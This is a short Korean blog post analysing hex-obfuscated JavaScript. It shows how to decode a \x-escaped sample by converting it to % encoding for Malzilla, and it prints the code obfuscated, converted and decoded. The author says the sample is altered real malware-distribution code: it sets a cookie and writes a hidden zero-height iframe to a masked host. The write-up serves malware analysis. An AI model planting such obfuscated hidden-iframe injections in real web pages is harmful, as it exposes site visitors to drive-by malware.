본문으로 바로가기

Hexdecimal Obfuscation #02

category Analysis/JS Obfuscation 2013.06.19 18:34

두번째 16진수 난독화 형태는 "\x"입니다.

if (window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"]["\x69\x6e\x64\x65\x78\x4f\x66"]('\x6e\x62\x32\x32\x39\x3d') == -1) {
    var aWdHMqss1 = new window["\x44\x61\x74\x65"]();
    aWdHMqss1["\x73\x65\x74\x54\x69\x6d\x65"](aWdHMqss1["\x67\x65\x74\x54\x69\x6d\x65"]() + 12 * 60 * 60 * 1000);
    window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"] = '\x6e\x62\x32\x32\x39\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d' + aWdHMqss1["\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67"]();
    window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x27\x68\x74\x74\x70\x3a\x2f\x2f\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2f\x6a\x73\x2f\x63\x6f\x6f\x6b\x69\x65\x2e\x68\x74\x6d\x6c\x27 \x77\x69\x64\x74\x68\x3d\x27\x31\x31\x36\x27 \x68\x65\x69\x67\x68\x74\x3d\x27\x30\x27 \x66\x72\x61\x6d\x65\x62\x6f\x72\x64\x65\x72\x3d\x27\x30\x27\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e");
}


"%" 형태의 16진수 난독화라면 Malzilla에서 바로 풀리지만, "\x" 난독화는 바로 풀리지 않기 때문에 다음과 같이 "\x"를 "%"로 치환하여 분석하면 됩니다.

if (window["%64%6f%63%75%6d%65%6e%74"]["%63%6f%6f%6b%69%65"]["%69%6e%64%65%78%4f%66"]('%6e%62%32%32%39%3d') == -1) {
    var aWdHMqss1 = new window["%44%61%74%65"]();
    aWdHMqss1["%73%65%74%54%69%6d%65"](aWdHMqss1["%67%65%74%54%69%6d%65"]() + 12 * 60 * 60 * 1000);
    window["%64%6f%63%75%6d%65%6e%74"]["%63%6f%6f%6b%69%65"] = '%6e%62%32%32%39%3d%59%65%73%3b%70%61%74%68%3d%2f%3b%65%78%70%69%72%65%73%3d' + aWdHMqss1["%74%6f%47%4d%54%53%74%72%69%6e%67"]();
    window["%64%6f%63%75%6d%65%6e%74"]["%77%72%69%74%65"]("%3c%69%66%72%61%6d%65 %73%72%63%3d%27%68%74%74%70%3a%2f%2f%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2f%6a%73%2f%63%6f%6f%6b%69%65%2e%68%74%6d%6c%27 %77%69%64%74%68%3d%27%31%31%36%27 %68%65%69%67%68%74%3d%27%30%27 %66%72%61%6d%65%62%6f%72%64%65%72%3d%27%30%27%3e%3c%2f%69%66%72%61%6d%65%3e");
}


if (window["document"]["cookie"]["indexOf"]('nb229=') == -1) {
    var aWdHMqss1 = new window["Date"]();
    aWdHMqss1["setTime"](aWdHMqss1["getTime"]() + 12 * 60 * 60 * 1000);
    window["document"]["cookie"] = 'nb229=Yes;path=/;expires=' + aWdHMqss1["toGMTString"]();
    window["document"]["write"]("<iframe src="http://****************/js/cookie.html" width="116" height="0" frameborder="0">");
}

* 실제 악성코드 유포하는 소스코드 중 샘플이기 때문에 일부 내용을 변경하였습니다.

'Analysis > JS Obfuscation' 카테고리의 다른 글

Dehydrating a string Technique  (1) 2013.07.26
Unicode Obfuscated  (0) 2013.06.24
Hexdecimal Obfuscation #02  (0) 2013.06.19
Vbscript Obfuscated  (2) 2013.06.19
Hexdecimal Obfuscation #01  (0) 2013.06.10
Split Obfuscated  (0) 2013.06.07

댓글을 달아 주세요

티스토리 툴바